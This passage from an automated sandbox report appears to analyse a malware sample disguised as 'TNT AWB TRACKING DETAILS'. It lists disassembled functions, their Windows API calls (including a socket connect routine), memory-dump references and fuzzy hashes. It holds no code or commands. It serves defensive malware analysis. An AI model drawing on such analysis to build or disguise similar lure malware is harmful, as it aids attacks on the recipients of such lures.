                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessageSend$_wcslen$_wcspbrk
                                      • String ID:
                                      • API String ID: 1856069659-0
                                      • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                      • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                      • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                      • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                      Function 004478AC Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCursorPos.USER32(?), ref: 004478E2
                                      • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                      • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                      • GetCursorPos.USER32(00000000), ref: 0044796A
                                      • TrackPopupMenuEx.USER32(030D6360,00000000,00000000,?,?,00000000), ref: 00447991
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: CursorMenuPopupTrack$Proc
                                      • String ID:
                                      • API String ID: 1300944170-0
                                      • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                      • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                      • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                      • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                      Function 004479A0 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetClientRect.USER32(?,?), ref: 004479CC
                                      • GetCursorPos.USER32(?), ref: 004479D7
                                      • ScreenToClient.USER32(?,?), ref: 004479F3
                                      • WindowFromPoint.USER32(?,?), ref: 00447A34
                                      • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Client$CursorFromPointProcRectScreenWindow
                                      • String ID:
                                      • API String ID: 1822080540-0
                                      • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                      • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                      • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                      • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                      Function 00447BF1 Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowRect.USER32(?,?), ref: 00447C5D
                                      • ScreenToClient.USER32(?,?), ref: 00447C7B
                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                      • EndPaint.USER32(?,?), ref: 00447D13
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ClientPaintRectRectangleScreenViewportWindow
                                      • String ID:
                                      • API String ID: 659298297-0
                                      • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                      • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                      • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                      • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                      Function 004487EA Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                      Download Yara Rule
                                      APIs
                                      • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                      • EnableWindow.USER32(?,00000001), ref: 00448B72
                                      • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                      • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                      • EnableWindow.USER32(?,00000001), ref: 00448C09
                                        • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                        • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                        • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                        • Part of subcall function 00440D98: SendMessageW.USER32(030D1B60,000000F1,00000000,00000000), ref: 00440E6E
                                        • Part of subcall function 00440D98: SendMessageW.USER32(030D1B60,000000F1,00000001,00000000), ref: 00440E9A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Window$EnableMessageSend$LongShow
                                      • String ID:
                                      • API String ID: 142311417-0
                                      • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                      • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                      • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                      • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                      Function 004550FC Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                      • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                      • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                      • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                      Function 00445870 Relevance: 7.6, APIs: 5, Instructions: 78windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • IsWindowVisible.USER32(?), ref: 00445879
                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                      • _wcslen.LIBCMT ref: 004458FB
                                      • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                      • String ID:
                                      • API String ID: 3087257052-0
                                      • Opcode ID: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                      • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                      • Opcode Fuzzy Hash: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                      • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                      Function 004653C8 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                      • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                      • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                      • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                      • String ID:
                                      • API String ID: 245547762-0
                                      • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                      • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                      • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                      • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                      Function 0044719B Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                      Download Yara Rule
                                      APIs
                                      • DeleteObject.GDI32(00000000), ref: 004471D8
                                      • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                      • SelectObject.GDI32(?,00000000), ref: 00447228
                                      • BeginPath.GDI32(?), ref: 0044723D
                                      • SelectObject.GDI32(?,00000000), ref: 00447266
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Object$Select$BeginCreateDeletePath
                                      • String ID:
                                      • API String ID: 2338827641-0
                                      • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                      • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                      • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                      • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                      Function 00434582 Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNEL32(00000000), ref: 00434598
                                      • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                      • Sleep.KERNEL32(00000000), ref: 004345D4
                                      • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: CounterPerformanceQuerySleep
                                      • String ID:
                                      • API String ID: 2875609808-0
                                      • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                      • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                      • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                      • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                      Function 00460C01 Relevance: 7.5, APIs: 5, Instructions: 48windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                      • MessageBeep.USER32(00000000), ref: 00460C46
                                      • KillTimer.USER32(?,0000040A), ref: 00460C68
                                      • EndDialog.USER32(?,00000001), ref: 00460C83
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                      • String ID:
                                      • API String ID: 3741023627-0
                                      • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                      • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                      • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                      • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                      Function 004556A0 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Destroy$DeleteObjectWindow$Icon
                                      • String ID:
                                      • API String ID: 4023252218-0
                                      • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                      • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                      • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                      • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                      Function 004555ED Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                      • DeleteObject.GDI32(?), ref: 00455736
                                      • DeleteObject.GDI32(?), ref: 00455744
                                      • DestroyIcon.USER32(?), ref: 00455752
                                      • DestroyWindow.USER32(?), ref: 00455760
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: DeleteDestroyObject$IconMessageSendWindow
                                      • String ID:
                                      • API String ID: 1489400265-0
                                      • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                      • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                      • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                      • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                      Function 00455607 Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                      • DestroyWindow.USER32(?), ref: 00455728
                                      • DeleteObject.GDI32(?), ref: 00455736
                                      • DeleteObject.GDI32(?), ref: 00455744
                                      • DestroyIcon.USER32(?), ref: 00455752
                                      • DestroyWindow.USER32(?), ref: 00455760
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                      • String ID:
                                      • API String ID: 1042038666-0
                                      • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                      • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                      • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                      • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                      Function 00417803 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __getptd.LIBCMT ref: 0041780F
                                        • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                        • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                      • __getptd.LIBCMT ref: 00417826
                                      • __amsg_exit.LIBCMT ref: 00417834
                                      • __lock.LIBCMT ref: 00417844
                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                      • String ID:
                                      • API String ID: 938513278-0
